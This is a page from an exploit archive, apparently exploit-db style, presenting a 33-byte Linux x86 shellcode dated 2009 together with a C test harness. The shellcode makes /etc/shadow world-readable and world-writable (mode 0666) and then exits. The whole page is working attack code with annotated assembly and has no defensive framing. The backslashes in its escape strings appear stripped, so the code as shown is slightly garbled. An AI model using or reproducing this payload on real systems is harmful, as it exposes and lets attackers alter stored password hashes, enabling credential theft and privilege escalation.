Linux - chmod(/etc/shadow, 0666) & exit()

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux - chmod(/etc/shadow, 0666) & exit() - 33 bytes
# Published : 2009-12-04
# Author : ka0x
# Previous Title : Linux - setuid(0) and cat /etc/shadow
# Next Title : Linux - linux/x86 execve() - 51bytes

#include <stdio.h>

/* 
	linux/x86 ; chmod(/etc/shadow, 0666) & exit() 33 bytes
	written by ka0x - <ka0x01[alt+64]gmail.com>
	lun sep 21 17:13:25 CEST 2009

	greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek and others!

*/

int main()
{

	char shellcode[] = 
			"x31xc0"			// xor eax,eax
			"x50"				// push eax
			"x68x61x64x6fx77"		// push dword 0x776f6461
			"x68x2fx2fx73x68"		// push dword 0x68732f2f
			"x68x2fx65x74x63"		// push dword 0x6374652f
			"x89xe3"			// mov ebx,esp
			"x66x68xb6x01"		// push word 0x1b6
			"x59"				// pop ecx
			"xb0x0f"			// mov al,0xf
			"xcdx80"			// int 0x80
			"xb0x01"			// mov al,0x1
			"xcdx80";			// int 0x80

	printf("[*] ShellCode size (bytes): %dnn", sizeof(shellcode)-1 );
	(*(void(*)()) shellcode)();
	
	return 0;
}